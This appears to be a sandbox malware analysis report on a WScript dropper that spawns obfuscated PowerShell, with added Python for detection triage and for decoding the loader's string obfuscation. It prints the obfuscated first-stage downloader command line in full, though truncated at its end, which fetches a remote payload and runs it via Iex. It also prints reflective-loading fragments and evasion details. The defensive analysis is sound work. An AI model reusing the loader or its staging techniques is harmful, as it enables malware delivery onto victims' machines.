              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: aqm.Core.pdbZ source: powershell.exe, 00000006.00000002.3346493152.0000000007103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3346493152.0000000007030000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: .Run("powershell " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decolori", "0")
              Source: Yara match  File source: 00000006.00000002.3353948398.000000000C936000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000006.00000002.3353773662.00000000084D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String($Regnskabsprincippers)$GLObaL:TIlskReRsAkSenES77 = [SYSTEm.Text.ENCODiNG]::ASCII.GEtstRing($PeAChLiKe)$GloBAl:unTUFted=$TILskrersAkSEnEs77.sUBstRiNG($soliDare,$pOlYadelPH)<#Undwelt Sl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Flames $Lbetjmorinens $Traditionalismen), (Rumina @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Etnografen = [AppDomain]::CurrentDomain.GetAssemblies()$g
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Misally)), $Serviceprisernes200).DefineDynamicModule($Campward7, $false).DefineType($Fingerspidsfornemmelserne, $Troldmandsorganisatio
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String($Regnskabsprincippers)$GLObaL:TIlskReRsAkSenES77 = [SYSTEm.Text.ENCODiNG]::ASCII.GEtstRing($PeAChLiKe)$GloBAl:unTUFted=$TILskrersAkSEnEs77.sUBstRiNG($soliDare,$pOlYadelPH)<#Undwelt Sl
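The three AMSI captures above are the second stage, and none of it is specific to this sample: a base64 blob is decoded and a substring cut out of it, a dynamic assembly is built with DefineDynamicAssembly/DefineDynamicModule/DefineType, and a function pointer is turned into a callable delegate with GetDelegateForFunctionPointer after walking [AppDomain]::CurrentDomain.GetAssemblies(). That is the reflective P/Invoke pattern that reaches Win32 APIs from PowerShell without Add-Type; the delegate signature (IntPtr, UInt32, UInt32, UInt32) returning IntPtr is consistent with VirtualAlloc. The same strings are worth hunting for in script block logging (event 4104) and AMSI telemetry. The Python below is an added triage heuristic written for this page, not part of the Joe Sandbox report or of any product rule set; the marker names, the verdict rule and the 0.15 casing threshold are the example's own choices, and the inputs are constructed from the three captured fragments above plus one benign line.

```python
"""Heuristic triage of PowerShell script block / AMSI text for the staging pattern in
this report: base64-decoded payload, dynamic assembly building, and reflective
resolution of Win32 functions. Example code written for this page; the marker
names, the verdict rule and the 0.15 threshold are the example's own choices."""
import re

# Each marker corresponds to something visible in the AMSI captures of this report.
API_MARKERS = {
    "reflective_delegate": re.compile(r"GetDelegateForFunctionPointer", re.I),
    "dynamic_assembly": re.compile(r"DefineDynamic(Assembly|Module)|DefineType", re.I),
    "assembly_enum": re.compile(r"\[AppDomain\]::CurrentDomain\.GetAssemblies", re.I),
    "base64_payload": re.compile(r"FromBase64String", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
}

# Randomly cased identifier fragments such as sUBstRiNG or TIlskReRsAkSenES77: a
# lowercase letter directly followed by two or more uppercase letters. PascalCase
# .NET names (GetDelegateForFunctionPointer) never match, so this separates the
# obfuscator's casing from ordinary code.
RANDOM_CASE = re.compile(r"[a-z][A-Z]{2,}")
IDENT = re.compile(r"[A-Za-z]{5,}")

# Any one of these is enough for a verdict on its own; base64 or iex alone is not,
# because plenty of legitimate modules decode base64 or call Invoke-Expression.
STRONG = {"reflective_delegate", "dynamic_assembly", "assembly_enum"}


def random_case_ratio(text: str) -> float:
    """Share of identifier-like tokens (5+ letters) that carry the random casing."""
    idents = IDENT.findall(text)
    if not idents:
        return 0.0
    return sum(1 for t in idents if RANDOM_CASE.search(t)) / len(idents)


def triage(text: str, case_threshold: float = 0.15) -> dict:
    """Return the markers hit, the random-case ratio and a verdict for one script block."""
    hits = [name for name, rx in API_MARKERS.items() if rx.search(text)]
    ratio = random_case_ratio(text)
    if ratio >= case_threshold:
        hits.append("random_case_identifiers")
    suspicious = bool(STRONG & set(hits)) or len(hits) >= 2
    return {"hits": hits, "random_case_ratio": round(ratio, 2), "suspicious": suspicious}


# Constructed inputs: one benign admin line and the three fragments quoted from the
# report's AMSI captures (truncated exactly as the report shows them).
SAMPLES = {
    "benign": "Get-ChildItem -Path $env:TEMP -Filter *.log | Remove-Item -Force",
    "stage_decode": "FromBase64String($Regnskabsprincippers)$GLObaL:TIlskReRsAkSenES77 = "
                    "[SYSTEm.Text.ENCODiNG]::ASCII.GEtstRing($PeAChLiKe)$GloBAl:unTUFted="
                    "$TILskrersAkSEnEs77.sUBstRiNG($soliDare,$pOlYadelPH)",
    "stage_delegate": "GetDelegateForFunctionPointer((Flames $Lbetjmorinens $Traditionalismen), "
                      "(Rumina @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
                      "$global:Etnografen = [AppDomain]::CurrentDomain.GetAssemblies()",
    "stage_assembly": "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Misally)), "
                      "$Serviceprisernes200).DefineDynamicModule($Campward7, $false)"
                      ".DefineType($Fingerspidsfornemmelserne, $Troldmandsorganisatio",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name:15} {triage(text)}")
```

The casing ratio is the cheap part and carries the first fragment on its own (half of its identifiers match), while the delegate and dynamic-assembly fragments trip strong markers with a ratio of zero; running both checks is what keeps a stage that has been re-cased or split across script blocks from slipping through either one.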
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
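The captured command line above is the whole first-stage loader; the only thing hiding it is the string decoder Udgangstilladelsernes, which keeps one character in five. $Stvregne=$Orlos+$host.UI is truthy ($Orlos is never assigned, so the sum is the host UI object), so $setaria++ runs on every call and the loop runs from index 4 to Length - 1 in steps of 5, dropping the trailing padding space; $Velkomstens74 is likewise unassigned and adds 0. Skilleliniens then runs & $Toilettaskens on the decoded text, and $Toilettaskens decodes to Iex. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample; it reproduces the decoder and applies it to four literals copied from the command line above (the regex CALL and the function names are the example's own).

```python
"""Decoder for the string obfuscation used by the PowerShell stage captured in this
report. Every literal handed to Udgangstilladelsernes is runs of four filler
characters followed by one real character; the function walks the string from
index 4 in steps of 5 and stops one short of its length, so the trailing padding
character is dropped. Example code written for this page, not the sample's code."""
import re


def decode_every_fifth(blob: str, start: int = 4, step: int = 5) -> str:
    """Mirror of Udgangstilladelsernes: keep blob[4], blob[9], ... below len(blob) - 1.

    The PowerShell bound is $Velkomstens74 + $Lupulus.Length - $setaria, where
    $Velkomstens74 is never assigned (so 0) and $setaria++ has run once (so 1).
    """
    end = len(blob) - 1
    return "".join(blob[i] for i in range(start, end, step))


# Matches every decoder call with its single-quoted argument. The name CALL is
# the example's own; the function name is the one in the captured command line.
CALL = re.compile(r"Udgangstilladelsernes\s+'([^']*)'")


def decode_calls(cmdline: str) -> list[tuple[str, str]]:
    """Return (obfuscated, decoded) pairs for each decoder call in cmdline."""
    return [(m.group(1), decode_every_fifth(m.group(1))) for m in CALL.finditer(cmdline)]


# Four literals copied verbatim from the captured command line (the full script is
# several thousand characters; this excerpt is enough to show the scheme).
SAMPLE = (
    "$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';"
    "$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';"
    "$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';"
    "$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';"
)

if __name__ == "__main__":
    for raw, clear in decode_calls(SAMPLE):
        print(f"{clear!r:14} <- {raw!r}")
```

The four literals decode to Mozilla/ (the $Tastetryk += literal that follows supplies the rest of a Firefox 131 User-Agent), User-AgENt, > (the separator the script later uses in $Kodekser=$Konstruktivt.Split($Kropsvisiteretndarbejde97), so $Konstruktivt is a >-delimited URL list and $Kodekser[0] the download URL) and Iex. Decoded the same way, the three Skilleliniens calls set $global:Tamburs=$env:APPDATA+$Proconscriptive (the drop path %APPDATA%\Udviklingsegnes.sep), split the URL list, and force [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 before the truncated New-Object System.Net.WebClient. Decode from the raw command line (Security event 4688 with command-line auditing, or the 4104 script block) rather than from a rendered report: HTML rendering collapses runs of spaces, every lost space shifts the filler positions, and not every literal on this page survives rendering intact.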
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD09D8 push E85DB45Dh; ret 4_2_00007FF848BD09F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD8555 pushad ; ret 4_2_00007FF848BD850D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD8555 push eax; ret 4_2_00007FF848BD851D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD24FA pushad ; ret 4_2_00007FF848BD850D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD850E push eax; ret 4_2_00007FF848BD851D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD82E9 pushad ; ret 4_2_00007FF848BD850D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD1AA5 push es; retf 4_2_00007FF848BD1ABA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FF848BD00BD pushad ; iretd 4_2_00007FF848BD00C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 6_2_0456C890 pushfd ; ret 6_2_0456C899
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 6_2_0456B631 push esp; iretd 6_2_0456B63D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 6_2_0456371F push esp; iretd 6_2_04563759
              Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX (3 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX (80 identical entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX (71 identical entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Initial file | Initial file: Do While Mrkeliges.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4710
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5211
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5254
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4579
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532 | Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: PING.EXE, 00000001.00000002.2037382649.000001CFB5978000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==pWP
              Source: powershell.exe, 00000004.00000002.2193263730.000002802E08F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_3136.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
